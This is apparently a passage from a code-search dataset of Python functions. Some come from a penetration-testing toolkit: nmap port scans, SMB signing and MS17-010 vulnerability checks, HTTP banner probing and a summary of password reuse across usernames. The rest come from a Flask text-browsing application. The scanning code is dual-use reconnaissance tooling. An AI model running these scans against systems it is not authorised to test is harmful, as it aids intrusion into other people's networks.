print_line("-"*100)
for entry in response.aggregations.password_count.buckets:
usernames = []
for creds in entry.top_hits:
usernames.append(creds.username[0])
usernames = list(set(usernames))
print_line("{0:65} {1:5} {2:5} {3:5} {4}".format(entry.key, entry.doc_count, entry.host_count.value, entry.username_count.value, usernames)) | python | {
"resource": ""
} |
q264860 | SimpleQuery.process | validation | def process(self, nemo):
""" Register nemo and parses annotations
.. note:: Process parses the annotation and extends informations about the target URNs by retrieving resource in range
:param nemo: Nemo
"""
self.__nemo__ = nemo
for annotation in self.__annotations__:
annotation.target.expanded = frozenset(
self.__getinnerreffs__(
objectId=annotation.target.objectId,
subreference=annotation.target.subreference
)
) | python | {
"resource": ""
} |
q264861 | pipe_worker | validation | def pipe_worker(pipename, filename, object_type, query, format_string, unique=False):
"""
Starts the loop to provide the data from jackal.
"""
print_notification("[{}] Starting pipe".format(pipename))
object_type = object_type()
try:
while True:
uniq = set()
# Remove the previous file if it exists
if os.path.exists(filename):
os.remove(filename)
# Create the named pipe
os.mkfifo(filename)
# This function will block until a process opens it
with open(filename, 'w') as pipe:
print_success("[{}] Providing data".format(pipename))
# Search the database
objects = object_type.search(**query)
for obj in objects:
data = fmt.format(format_string, **obj.to_dict())
if unique:
if not data in uniq:
uniq.add(data)
pipe.write(data + '\n')
else:
pipe.write(data + '\n')
os.unlink(filename)
except KeyboardInterrupt:
print_notification("[{}] Shutting down named pipe".format(pipename))
except Exception as e:
print_error("[{}] Error: {}, stopping named pipe".format(e, pipename))
finally:
os.remove(filename) | python | {
"resource": ""
} |
q264862 | create_query | validation | def create_query(section):
"""
Creates a search query based on the section of the config file.
"""
query = {}
if 'ports' in section:
query['ports'] = [section['ports']]
if 'up' in section:
query['up'] = bool(section['up'])
if 'search' in section:
query['search'] = [section['search']]
if 'tags' in section:
query['tags'] = [section['tags']]
if 'groups' in section:
query['groups'] = [section['groups']]
return query | python | {
"resource": ""
} |
q264863 | create_pipe_workers | validation | def create_pipe_workers(configfile, directory):
"""
Creates the workers based on the given configfile to provide named pipes in the directory.
"""
type_map = {'service': ServiceSearch,
'host': HostSearch, 'range': RangeSearch,
'user': UserSearch}
config = configparser.ConfigParser()
config.read(configfile)
if not len(config.sections()):
print_error("No named pipes configured")
return
print_notification("Starting {} pipes in directory {}".format(
len(config.sections()), directory))
workers = []
for name in config.sections():
section = config[name]
query = create_query(section)
object_type = type_map[section['type']]
args = (name, os.path.join(directory, name), object_type, query,
section['format'], bool(section.get('unique', 0)))
workers.append(multiprocessing.Process(target=pipe_worker, args=args))
return workers | python | {
"resource": ""
} |
q264864 | main | validation | def main():
"""
Loads the config and handles the workers.
"""
config = Config()
pipes_dir = config.get('pipes', 'directory')
pipes_config = config.get('pipes', 'config_file')
pipes_config_path = os.path.join(config.config_dir, pipes_config)
if not os.path.exists(pipes_config_path):
print_error("Please configure the named pipes first")
return
workers = create_pipe_workers(pipes_config_path, pipes_dir)
if workers:
for worker in workers:
worker.start()
try:
for worker in workers:
worker.join()
except KeyboardInterrupt:
print_notification("Shutting down")
for worker in workers:
worker.terminate()
worker.join() | python | {
"resource": ""
} |
q264865 | f_i18n_iso | validation | def f_i18n_iso(isocode, lang="eng"):
""" Replace isocode by its language equivalent
:param isocode: Three character long language code
:param lang: Lang in which to return the language name
:return: Full Text Language Name
"""
if lang not in flask_nemo._data.AVAILABLE_TRANSLATIONS:
lang = "eng"
try:
return flask_nemo._data.ISOCODES[isocode][lang]
except KeyError:
return "Unknown" | python | {
"resource": ""
} |
q264866 | f_hierarchical_passages | validation | def f_hierarchical_passages(reffs, citation):
""" A function to construct a hierarchical dictionary representing the different citation layers of a text
:param reffs: passage references with human-readable equivalent
:type reffs: [(str, str)]
:param citation: Main Citation
:type citation: Citation
:return: nested dictionary representing where keys represent the names of the levels and the final values represent the passage reference
:rtype: OrderedDict
"""
d = OrderedDict()
levels = [x for x in citation]
for cit, name in reffs:
ref = cit.split('-')[0]
levs = ['%{}|{}%'.format(levels[i].name, v) for i, v in enumerate(ref.split('.'))]
getFromDict(d, levs[:-1])[name] = cit
return d | python | {
"resource": ""
} |
q264867 | f_i18n_citation_type | validation | def f_i18n_citation_type(string, lang="eng"):
""" Take a string of form %citation_type|passage% and format it for human
:param string: String of formation %citation_type|passage%
:param lang: Language to translate to
:return: Human Readable string
.. note :: To Do : Use i18n tools and provide real i18n
"""
s = " ".join(string.strip("%").split("|"))
return s.capitalize() | python | {
"resource": ""
} |
q264868 | f_annotation_filter | validation | def f_annotation_filter(annotations, type_uri, number):
""" Annotation filtering filter
:param annotations: List of annotations
:type annotations: [AnnotationResource]
:param type_uri: URI Type on which to filter
:type type_uri: str
:param number: Number of the annotation to return
:type number: int
:return: Annotation(s) matching the request
:rtype: [AnnotationResource] or AnnotationResource
"""
filtered = [
annotation
for annotation in annotations
if annotation.type_uri == type_uri
]
number = min([len(filtered), number])
if number == 0:
return None
else:
return filtered[number-1] | python | {
"resource": ""
} |
q264869 | check_service | validation | def check_service(service):
"""
Connect to a service to see if it is a http or https server.
"""
# Try HTTP
service.add_tag('header_scan')
http = False
try:
result = requests.head('http://{}:{}'.format(service.address, service.port), timeout=1)
print_success("Found http service on {}:{}".format(service.address, service.port))
service.add_tag('http')
http = True
try:
service.banner = result.headers['Server']
except KeyError:
pass
except (ConnectionError, ConnectTimeout, ReadTimeout, Error):
pass
if not http:
# Try HTTPS
try:
result = requests.head('https://{}:{}'.format(service.address, service.port), verify=False, timeout=3)
service.add_tag('https')
print_success("Found https service on {}:{}".format(service.address, service.port))
try:
service.banner = result.headers['Server']
except KeyError:
pass
except (ConnectionError, ConnectTimeout, ReadTimeout, Error):
pass
service.save() | python | {
"resource": ""
} |
q264870 | main | validation | def main():
"""
Retrieves services starts check_service in a gevent pool of 100.
"""
search = ServiceSearch()
services = search.get_services(up=True, tags=['!header_scan'])
print_notification("Scanning {} services".format(len(services)))
# Disable the insecure request warning
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
pool = Pool(100)
count = 0
for service in services:
count += 1
if count % 50 == 0:
print_notification("Checking {}/{} services".format(count, len(services)))
pool.spawn(check_service, service)
pool.join()
print_notification("Completed, 'http' tag added to services that respond to http, 'https' tag added to services that respond to https.") | python | {
"resource": ""
} |
q264871 | import_nmap | validation | def import_nmap(result, tag, check_function=all_hosts, import_services=False):
"""
Imports the given nmap result.
"""
host_search = HostSearch(arguments=False)
service_search = ServiceSearch()
parser = NmapParser()
report = parser.parse_fromstring(result)
imported_hosts = 0
imported_services = 0
for nmap_host in report.hosts:
if check_function(nmap_host):
imported_hosts += 1
host = host_search.id_to_object(nmap_host.address)
host.status = nmap_host.status
host.add_tag(tag)
if nmap_host.os_fingerprinted:
host.os = nmap_host.os_fingerprint
if nmap_host.hostnames:
host.hostname.extend(nmap_host.hostnames)
if import_services:
for service in nmap_host.services:
imported_services += 1
serv = Service(**service.get_dict())
serv.address = nmap_host.address
service_id = service_search.object_to_id(serv)
if service_id:
# Existing object, save the banner and script results.
serv_old = Service.get(service_id)
if service.banner:
serv_old.banner = service.banner
# TODO implement
# if service.script_results:
# serv_old.script_results.extend(service.script_results)
serv_old.save()
else:
# New object
serv.address = nmap_host.address
serv.save()
if service.state == 'open':
host.open_ports.append(service.port)
if service.state == 'closed':
host.closed_ports.append(service.port)
if service.state == 'filtered':
host.filtered_ports.append(service.port)
host.save()
if imported_hosts:
print_success("Imported {} hosts, with tag {}".format(imported_hosts, tag))
else:
print_error("No hosts found")
return {'hosts': imported_hosts, 'services': imported_services} | python | {
"resource": ""
} |
q264872 | nmap | validation | def nmap(nmap_args, ips):
"""
Start an nmap process with the given args on the given ips.
"""
config = Config()
arguments = ['nmap', '-Pn']
arguments.extend(ips)
arguments.extend(nmap_args)
output_file = ''
now = datetime.datetime.now()
if not '-oA' in nmap_args:
output_name = 'nmap_jackal_{}'.format(now.strftime("%Y-%m-%d %H:%M"))
path_name = os.path.join(config.get('nmap', 'directory'), output_name)
print_notification("Writing output of nmap to {}".format(path_name))
if not os.path.exists(config.get('nmap', 'directory')):
os.makedirs(config.get('nmap', 'directory'))
output_file = path_name + '.xml'
arguments.extend(['-oA', path_name])
else:
output_file = nmap_args[nmap_args.index('-oA') + 1] + '.xml'
print_notification("Starting nmap")
subprocess.call(arguments)
with open(output_file, 'r') as f:
return f.read() | python | {
"resource": ""
} |
q264873 | nmap_scan | validation | def nmap_scan():
"""
Scans the given hosts with nmap.
"""
# Create the search and config objects
hs = HostSearch()
config = Config()
# Static options to be able to figure out what options to use depending on the input the user gives.
nmap_types = ['top10', 'top100', 'custom', 'top1000', 'all']
options = {'top10':'--top-ports 10', 'top100':'--top-ports 100', 'custom': config.get('nmap', 'options'), 'top1000': '--top-ports 1000', 'all': '-p-'}
# Create an argument parser
hs_parser = hs.argparser
argparser = argparse.ArgumentParser(parents=[hs_parser], conflict_handler='resolve', \
description="Scans hosts from the database using nmap, any arguments that are not in the help are passed to nmap")
argparser.add_argument('type', metavar='type', \
help='The number of ports to scan: top10, top100, custom, top1000 (default) or all', \
type=str, choices=nmap_types, default='top1000', const='top1000', nargs='?')
arguments, extra_nmap_args = argparser.parse_known_args()
# Fix the tags for the search
tags = nmap_types[nmap_types.index(arguments.type):]
tags = ["!nmap_" + tag for tag in tags]
hosts = hs.get_hosts(tags=tags)
hosts = [host for host in hosts]
# Create the nmap arguments
nmap_args = []
nmap_args.extend(extra_nmap_args)
nmap_args.extend(options[arguments.type].split(' '))
# Run nmap
print_notification("Running nmap with args: {} on {} hosts(s)".format(nmap_args, len(hosts)))
if len(hosts):
result = nmap(nmap_args, [str(h.address) for h in hosts])
# Import the nmap result
for host in hosts:
host.add_tag("nmap_{}".format(arguments.type))
host.save()
print_notification("Nmap done, importing results")
stats = import_nmap(result, "nmap_{}".format(arguments.type), check_function=all_hosts, import_services=True)
stats['scanned_hosts'] = len(hosts)
stats['type'] = arguments.type
Logger().log('nmap_scan', "Performed nmap {} scan on {} hosts".format(arguments.type, len(hosts)), stats)
else:
print_notification("No hosts found") | python | {
"resource": ""
} |
q264874 | nmap_smb_vulnscan | validation | def nmap_smb_vulnscan():
"""
Scans available smb services in the database for smb signing and ms17-010.
"""
service_search = ServiceSearch()
services = service_search.get_services(ports=['445'], tags=['!smb_vulnscan'], up=True)
services = [service for service in services]
service_dict = {}
for service in services:
service.add_tag('smb_vulnscan')
service_dict[str(service.address)] = service
nmap_args = "-Pn -n --disable-arp-ping --script smb-security-mode.nse,smb-vuln-ms17-010.nse -p 445".split(" ")
if services:
result = nmap(nmap_args, [str(s.address) for s in services])
parser = NmapParser()
report = parser.parse_fromstring(result)
smb_signing = 0
ms17 = 0
for nmap_host in report.hosts:
for script_result in nmap_host.scripts_results:
script_result = script_result.get('elements', {})
service = service_dict[str(nmap_host.address)]
if script_result.get('message_signing', '') == 'disabled':
print_success("({}) SMB Signing disabled".format(nmap_host.address))
service.add_tag('smb_signing_disabled')
smb_signing += 1
if script_result.get('CVE-2017-0143', {}).get('state', '') == 'VULNERABLE':
print_success("({}) Vulnerable for MS17-010".format(nmap_host.address))
service.add_tag('MS17-010')
ms17 += 1
service.update(tags=service.tags)
print_notification("Completed, 'smb_signing_disabled' tag added to systems with smb signing disabled, 'MS17-010' tag added to systems that did not apply MS17-010.")
stats = {'smb_signing': smb_signing, 'MS17_010': ms17, 'scanned_services': len(services)}
Logger().log('smb_vulnscan', 'Scanned {} smb services for vulnerabilities'.format(len(services)), stats)
else:
print_notification("No services found to scan.") | python | {
"resource": ""
} |
q264875 | overview | validation | def overview():
"""
Function to create an overview of the services.
Will print a list of ports found and the number of times the port was seen.
"""
search = Service.search()
search = search.filter("term", state='open')
search.aggs.bucket('port_count', 'terms', field='port', order={'_count': 'desc'}, size=100) \
.metric('unique_count', 'cardinality', field='address')
response = search.execute()
print_line("Port Count")
print_line("---------------")
for entry in response.aggregations.port_count.buckets:
print_line("{0:<7} {1}".format(entry.key, entry.unique_count.value)) | python | {
"resource": ""
} |
q264876 | _plugin_endpoint_rename | validation | def _plugin_endpoint_rename(fn_name, instance):
""" Rename endpoint function name to avoid conflict when namespacing is set to true
:param fn_name: Name of the route function
:param instance: Instance bound to the function
:return: Name of the new namespaced function name
"""
if instance and instance.namespaced:
fn_name = "r_{0}_{1}".format(instance.name, fn_name[2:])
return fn_name | python | {
"resource": ""
} |
q264877 | Nemo.get_locale | validation | def get_locale(self):
""" Retrieve the best matching locale using request headers
.. note:: Probably one of the thing to enhance quickly.
:rtype: str
"""
best_match = request.accept_languages.best_match(['de', 'fr', 'en', 'la'])
if best_match is None:
if len(request.accept_languages) > 0:
best_match = request.accept_languages[0][0][:2]
else:
return self.__default_lang__
lang = self.__default_lang__
if best_match == "de":
lang = "ger"
elif best_match == "fr":
lang = "fre"
elif best_match == "en":
lang = "eng"
elif best_match == "la":
lang = "lat"
return lang | python | {
"resource": ""
} |
q264878 | Nemo.transform | validation | def transform(self, work, xml, objectId, subreference=None):
""" Transform input according to potentially registered XSLT
.. note:: Since 1.0.0, transform takes an objectId parameter which represents the passage being called
.. note:: Because an XSLT object cannot be used twice, we re-create the XSLT transformer at every call
.. warning:: Until a C libxslt error is fixed ( https://bugzilla.gnome.org/show_bug.cgi?id=620102 ), \
it is not possible to use strip tags in the xslt given to this application
:param work: Work object containing metadata about the xml
:type work: MyCapytains.resources.inventory.Text
:param xml: XML to transform
:type xml: etree._Element
:param objectId: Object Identifier
:type objectId: str
:param subreference: Subreference
:type subreference: str
:return: String representation of transformed resource
:rtype: str
"""
# Check first whether an object-specific transformation is registered
if str(objectId) in self._transform:
func = self._transform[str(objectId)]
else:
func = self._transform["default"]
# If we have a string, it means we get a XSL filepath
if isinstance(func, str):
with open(func) as f:
xslt = etree.XSLT(etree.parse(f))
return etree.tostring(
xslt(xml),
encoding=str, method="html",
xml_declaration=None, pretty_print=False, with_tail=True, standalone=None
)
# If we have a function, it means we return the result of the function
elif isinstance(func, Callable):
return func(work, xml, objectId, subreference)
# If we have None, it means we just give back the xml
elif func is None:
return etree.tostring(xml, encoding=str) | python | {
"resource": ""
} |
q264879 | Nemo.get_inventory | validation | def get_inventory(self):
""" Request the api endpoint to retrieve information about the inventory
:return: Main Collection
:rtype: Collection
"""
if self._inventory is not None:
return self._inventory
self._inventory = self.resolver.getMetadata()
return self._inventory | python | {
"resource": ""
} |
q264880 | Nemo.get_reffs | validation | def get_reffs(self, objectId, subreference=None, collection=None, export_collection=False):
""" Retrieve and transform a list of references.
Returns the inventory collection object with its metadata and a callback function taking a level parameter \
and returning a list of strings.
:param objectId: Collection Identifier
:type objectId: str
:param subreference: Subreference from which to retrieve children
:type subreference: str
:param collection: Collection object bearing metadata
:type collection: Collection
:param export_collection: Return collection metadata
:type export_collection: bool
:return: Returns either the list of references, or the text collection object with its references as tuple
:rtype: (Collection, [str]) or [str]
"""
if collection is not None:
text = collection
else:
text = self.get_collection(objectId)
reffs = self.chunk(
text,
lambda level: self.resolver.getReffs(objectId, level=level, subreference=subreference)
)
if export_collection is True:
return text, reffs
return reffs | python | {
"resource": ""
} |
q264881 | Nemo.get_passage | validation | def get_passage(self, objectId, subreference):
""" Retrieve the passage identified by the parameters
:param objectId: Collection Identifier
:type objectId: str
:param subreference: Subreference of the passage
:type subreference: str
:return: An object bearing metadata and its text
:rtype: InteractiveTextualNode
"""
passage = self.resolver.getTextualNode(
textId=objectId,
subreference=subreference,
metadata=True
)
return passage | python | {
"resource": ""
} |
q264882 | Nemo.get_siblings | validation | def get_siblings(self, objectId, subreference, passage):
""" Get siblings of a browsed subreference
.. note:: Since 1.0.0c, there is no more prevnext dict. Nemo uses the list of original\
chunked references to retrieve next and previous, or simply relies on the resolver to get siblings\
when the subreference is not found in given original chunks.
:param objectId: Id of the object
:param subreference: Subreference of the object
:param passage: Current Passage
:return: Previous and next references
:rtype: (str, str)
"""
reffs = [reff for reff, _ in self.get_reffs(objectId)]
if subreference in reffs:
index = reffs.index(subreference)
# Not the first item and not the last one
if 0 < index < len(reffs) - 1:
return reffs[index-1], reffs[index+1]
elif index == 0 and index < len(reffs) - 1:
return None, reffs[1]
elif index > 0 and index == len(reffs) - 1:
return reffs[index-1], None
else:
return None, None
else:
return passage.siblingsId | python | {
"resource": ""
} |
q264883 | Nemo.semantic | validation | def semantic(self, collection, parent=None):
""" Generates a SEO friendly string for given collection
:param collection: Collection object to generate string for
:param parent: Current collection parent
:return: SEO/URL Friendly string
"""
if parent is not None:
collections = parent.parents[::-1] + [parent, collection]
else:
collections = collection.parents[::-1] + [collection]
return filters.slugify("--".join([item.get_label() for item in collections if item.get_label()])) | python | {
"resource": ""
} |
q264884 | Nemo.make_coins | validation | def make_coins(self, collection, text, subreference="", lang=None):
""" Creates a CoINS Title string from information
:param collection: Collection to create coins from
:param text: Text/Passage object
:param subreference: Subreference
:param lang: Locale information
:return: Coins HTML title value
"""
if lang is None:
lang = self.__default_lang__
return "url_ver=Z39.88-2004"\
"&ctx_ver=Z39.88-2004"\
"&rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook"\
"&rft_id={cid}"\
"&rft.genre=bookitem"\
"&rft.btitle={title}"\
"&rft.edition={edition}"\
"&rft.au={author}"\
"&rft.atitle={pages}"\
"&rft.language={language}"\
"&rft.pages={pages}".format(
title=quote(str(text.get_title(lang))), author=quote(str(text.get_creator(lang))),
cid=url_for(".r_collection", objectId=collection.id, _external=True),
language=collection.lang, pages=quote(subreference), edition=quote(str(text.get_description(lang)))
) | python | {
"resource": ""
} |
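The returned string is meant to sit in the title attribute of an empty span with class Z3988, the usual COinS embedding convention; a hedged, runnable sketch (the coins value below is a shortened stand-in for a real make_coins result):

from markupsafe import Markup

# `coins_value` stands in for the return value of make_coins above.
coins_value = "url_ver=Z39.88-2004&ctx_ver=Z39.88-2004&rft.btitle=Example"
span = Markup('<span class="Z3988" title="{}"></span>').format(coins_value)  # .format() escapes the value
print(span)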
q264885 | Nemo.expose_ancestors_or_children | validation | def expose_ancestors_or_children(self, member, collection, lang=None):
""" Build an ancestor or descendant dict view based on selected information
:param member: Current Member to build for
:param collection: Collection from which we retrieved it
:param lang: Language to express data in
:return: Dict view of the member (id, label, model, type, size, semantic slug and, for resources, lang)
"""
x = {
"id": member.id,
"label": str(member.get_label(lang)),
"model": str(member.model),
"type": str(member.type),
"size": member.size,
"semantic": self.semantic(member, parent=collection)
}
if isinstance(member, ResourceCollection):
x["lang"] = str(member.lang)
return x | python | {
"resource": ""
} |
q264886 | Nemo.make_members | validation | def make_members(self, collection, lang=None):
""" Build member list for given collection
:param collection: Collection to build dict view of for its members
:param lang: Language to express data in
:return: List of basic objects
"""
objects = sorted([
self.expose_ancestors_or_children(member, collection, lang=lang)
for member in collection.members
if member.get_label()
],
key=itemgetter("label")
)
return objects | python | {
"resource": ""
} |
q264887 | Nemo.make_parents | validation | def make_parents(self, collection, lang=None):
""" Build parents list for given collection
:param collection: Collection to build dict view of for its members
:param lang: Language to express data in
:return: List of basic objects
"""
return [
{
"id": member.id,
"label": str(member.get_label(lang)),
"model": str(member.model),
"type": str(member.type),
"size": member.size
}
for member in collection.parents
if member.get_label()
] | python | {
"resource": ""
} |
q264888 | Nemo.r_collections | validation | def r_collections(self, lang=None):
""" Retrieve the top collections of the inventory
:param lang: Lang in which to express main data
:type lang: str
:return: Collections information and template
:rtype: {str: Any}
"""
collection = self.resolver.getMetadata()
return {
"template": "main::collection.html",
"current_label": collection.get_label(lang),
"collections": {
"members": self.make_members(collection, lang=lang)
}
} | python | {
"resource": ""
} |
q264889 | Nemo.r_collection | validation | def r_collection(self, objectId, lang=None):
""" Collection content browsing route function
:param objectId: Collection identifier
:type objectId: str
:param lang: Lang in which to express main data
:type lang: str
:return: Template and collections contained in given collection
:rtype: {str: Any}
"""
collection = self.resolver.getMetadata(objectId)
return {
"template": "main::collection.html",
"collections": {
"current": {
"label": str(collection.get_label(lang)),
"id": collection.id,
"model": str(collection.model),
"type": str(collection.type),
},
"members": self.make_members(collection, lang=lang),
"parents": self.make_parents(collection, lang=lang)
},
} | python | {
"resource": ""
} |
q264890 | Nemo.r_references | validation | def r_references(self, objectId, lang=None):
""" Text exemplar references browsing route function
:param objectId: Collection identifier
:type objectId: str
:param lang: Lang in which to express main data
:type lang: str
:return: Template and required information about text with its references
"""
collection, reffs = self.get_reffs(objectId=objectId, export_collection=True)
return {
"template": "main::references.html",
"objectId": objectId,
"citation": collection.citation,
"collections": {
"current": {
"label": collection.get_label(lang),
"id": collection.id,
"model": str(collection.model),
"type": str(collection.type),
},
"parents": self.make_parents(collection, lang=lang)
},
"reffs": reffs
} | python | {
"resource": ""
} |
q264891 | Nemo.r_first_passage | validation | def r_first_passage(self, objectId):
""" Provides a redirect to the first passage of given objectId
:param objectId: Collection identifier
:type objectId: str
:return: Redirection to the first passage of given text
"""
collection, reffs = self.get_reffs(objectId=objectId, export_collection=True)
first, _ = reffs[0]
return redirect(
url_for(".r_passage_semantic", objectId=objectId, subreference=first, semantic=self.semantic(collection))
) | python | {
"resource": ""
} |
q264892 | Nemo.r_passage | validation | def r_passage(self, objectId, subreference, lang=None):
""" Retrieve the text of the passage
:param objectId: Collection identifier
:type objectId: str
:param lang: Lang in which to express main data
:type lang: str
:param subreference: Reference identifier
:type subreference: str
:return: Template, collections metadata and Markup object representing the text
:rtype: {str: Any}
"""
collection = self.get_collection(objectId)
if isinstance(collection, CtsWorkMetadata):
editions = [t for t in collection.children.values() if isinstance(t, CtsEditionMetadata)]
if len(editions) == 0:
raise UnknownCollection("This work has no default edition")
return redirect(url_for(".r_passage", objectId=str(editions[0].id), subreference=subreference))
text = self.get_passage(objectId=objectId, subreference=subreference)
passage = self.transform(text, text.export(Mimetypes.PYTHON.ETREE), objectId)
prev_reff, next_reff = self.get_siblings(objectId, subreference, text)  # avoid shadowing the next() builtin
return {
"template": "main::text.html",
"objectId": objectId,
"subreference": subreference,
"collections": {
"current": {
"label": collection.get_label(lang),
"id": collection.id,
"model": str(collection.model),
"type": str(collection.type),
"author": text.get_creator(lang),
"title": text.get_title(lang),
"description": text.get_description(lang),
"citation": collection.citation,
"coins": self.make_coins(collection, text, subreference, lang=lang)
},
"parents": self.make_parents(collection, lang=lang)
},
"text_passage": Markup(passage),
"prev": prev,
"next": next
} | python | {
"resource": ""
} |
q264893 | Nemo.r_assets | validation | def r_assets(self, filetype, asset):
""" Route for specific assets.
:param filetype: Asset Type
:param asset: Filename of an asset
:return: Response
"""
if filetype in self.assets and asset in self.assets[filetype] and self.assets[filetype][asset]:
return send_from_directory(
directory=self.assets[filetype][asset],
filename=asset
)
abort(404) | python | {
"resource": ""
} |
q264894 | Nemo.register_assets | validation | def register_assets(self):
""" Merge and register assets, both as routes and dictionary
:return: None
"""
self.blueprint.add_url_rule(
# Register another path to ensure assets compatibility
"{0}.secondary/<filetype>/<asset>".format(self.static_url_path),
view_func=self.r_assets,
endpoint="secondary_assets",
methods=["GET"]
) | python | {
"resource": ""
} |
q264895 | Nemo.create_blueprint | validation | def create_blueprint(self):
""" Create blueprint and register rules
:return: Blueprint of the current nemo app
:rtype: flask.Blueprint
"""
self.register_plugins()
self.blueprint = Blueprint(
self.name,
"nemo",
url_prefix=self.prefix,
template_folder=self.template_folder,
static_folder=self.static_folder,
static_url_path=self.static_url_path
)
for url, name, methods, instance in self._urls:
self.blueprint.add_url_rule(
url,
view_func=self.view_maker(name, instance),
endpoint=_plugin_endpoint_rename(name, instance),
methods=methods
)
for url, name, methods, instance in self._semantic_url:
self.blueprint.add_url_rule(
url,
view_func=self.view_maker(name, instance),
endpoint=_plugin_endpoint_rename(name, instance)+"_semantic",
methods=methods
)
self.register_assets()
self.register_filters()
# We extend the loading list by the instance value
self.__templates_namespaces__.extend(self.__instance_templates__)
# We generate a template loader
for namespace, directory in self.__templates_namespaces__[::-1]:
if namespace not in self.__template_loader__:
self.__template_loader__[namespace] = []
self.__template_loader__[namespace].append(
jinja2.FileSystemLoader(op.abspath(directory))
)
self.blueprint.jinja_loader = jinja2.PrefixLoader(
{namespace: jinja2.ChoiceLoader(paths) for namespace, paths in self.__template_loader__.items()},
"::"
)
if self.cache is not None:
for func, instance in self.cached:
setattr(instance, func.__name__, self.cache.memoize()(func))
return self.blueprint | python | {
"resource": ""
} |
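The ::-delimited template namespaces built here can be reproduced standalone; a minimal sketch with made-up directories, where earlier loaders in the ChoiceLoader win (which is how instance templates override packaged ones):

import jinja2

loader = jinja2.PrefixLoader(
    {
        "main": jinja2.ChoiceLoader([
            jinja2.FileSystemLoader("./my_overrides"),   # hypothetical: checked first
            jinja2.FileSystemLoader("./nemo_defaults"),  # hypothetical: packaged fallback
        ])
    },
    "::"  # namespace delimiter, as in create_blueprint above
)
env = jinja2.Environment(loader=loader)
# env.get_template("main::collection.html") would search both directories in order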
q264896 | Nemo.view_maker | validation | def view_maker(self, name, instance=None):
""" Create a view
:param name: Name of the route function to use for the view.
:type name: str
:param instance: Instance on which the route function is looked up (defaults to the current Nemo object)
:return: Route function which makes use of Nemo context (such as menu information)
:rtype: function
"""
if instance is None:
instance = self
sig = "lang" in [
parameter.name
for parameter in inspect.signature(getattr(instance, name)).parameters.values()
]
def route(**kwargs):
if sig and "lang" not in kwargs:
kwargs["lang"] = self.get_locale()
if "semantic" in kwargs:
del kwargs["semantic"]
return self.route(getattr(instance, name), **kwargs)
return route | python | {
"resource": ""
} |
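The signature inspection used above can be verified in isolation; a small runnable sketch with a hypothetical route function:

import inspect

def r_example(objectId, lang=None):  # hypothetical route function
    return {"objectId": objectId, "lang": lang}

has_lang = "lang" in [
    parameter.name
    for parameter in inspect.signature(r_example).parameters.values()
]
print(has_lang)  # True, so view_maker would inject the current locale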
q264897 | Nemo.main_collections | validation | def main_collections(self, lang=None):
""" Retrieve main parent collections of a repository
:param lang: Language to retrieve information in
:return: Sorted collections representations
"""
return sorted([
{
"id": member.id,
"label": str(member.get_label(lang=lang)),
"model": str(member.model),
"type": str(member.type),
"size": member.size
}
for member in self.resolver.getMetadata().members
], key=itemgetter("label")) | python | {
"resource": ""
} |
q264898 | Nemo.make_cache_keys | validation | def make_cache_keys(self, endpoint, kwargs):
""" This function is built to provide cache keys for templates
:param endpoint: Current endpoint
:param kwargs: Keyword Arguments
:return: Tuple of the i18n-dependent cache key and the i18n-agnostic cache key
:rtype: tuple(str)
"""
keys = sorted(kwargs.keys())
i18n_cache_key = endpoint+"|"+"|".join([kwargs[k] for k in keys])
if "lang" in keys:
cache_key = endpoint+"|" + "|".join([kwargs[k] for k in keys if k != "lang"])
else:
cache_key = i18n_cache_key
return i18n_cache_key, cache_key | python | {
"resource": ""
} |
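A worked example of the two keys, with a stand-in endpoint and illustrative argument values:

endpoint = "main.r_passage"  # hypothetical endpoint name
kwargs = {"objectId": "urn:cts:example:1", "subreference": "1.1", "lang": "eng"}

keys = sorted(kwargs.keys())
i18n_key = endpoint + "|" + "|".join(kwargs[k] for k in keys)
plain_key = endpoint + "|" + "|".join(kwargs[k] for k in keys if k != "lang")
print(i18n_key)   # main.r_passage|eng|urn:cts:example:1|1.1
print(plain_key)  # main.r_passage|urn:cts:example:1|1.1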
q264899 | Nemo.render | validation | def render(self, template, **kwargs):
""" Render a route template and adds information to this route.
:param template: Template name.
:type template: str
:param kwargs: dictionary of named arguments used to be passed to the template
:type kwargs: dict
:return: Http Response with rendered template
:rtype: flask.Response
"""
kwargs["cache_key"] = "%s" % kwargs["url"].values()
kwargs["lang"] = self.get_locale()
kwargs["assets"] = self.assets
kwargs["main_collections"] = self.main_collections(kwargs["lang"])
kwargs["cache_active"] = self.cache is not None
kwargs["cache_time"] = 0
kwargs["cache_key"], kwargs["cache_key_i18n"] = self.make_cache_keys(request.endpoint, kwargs["url"])
kwargs["template"] = template
for plugin in self.__plugins_render_views__:
kwargs.update(plugin.render(**kwargs))
return render_template(kwargs["template"], **kwargs) | python | {
"resource": ""
} |
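Since render merges plugin.render(**kwargs) into the template context, a render plugin only needs a render method returning a dict; a minimal hypothetical stand-in:

class FooterPlugin:
    """Hypothetical render plugin: receives the view kwargs and returns
    extra keys that render() merges into the template context."""
    def render(self, **kwargs):
        return {"footer_note": "rendered in %s" % kwargs.get("lang", "unknown")}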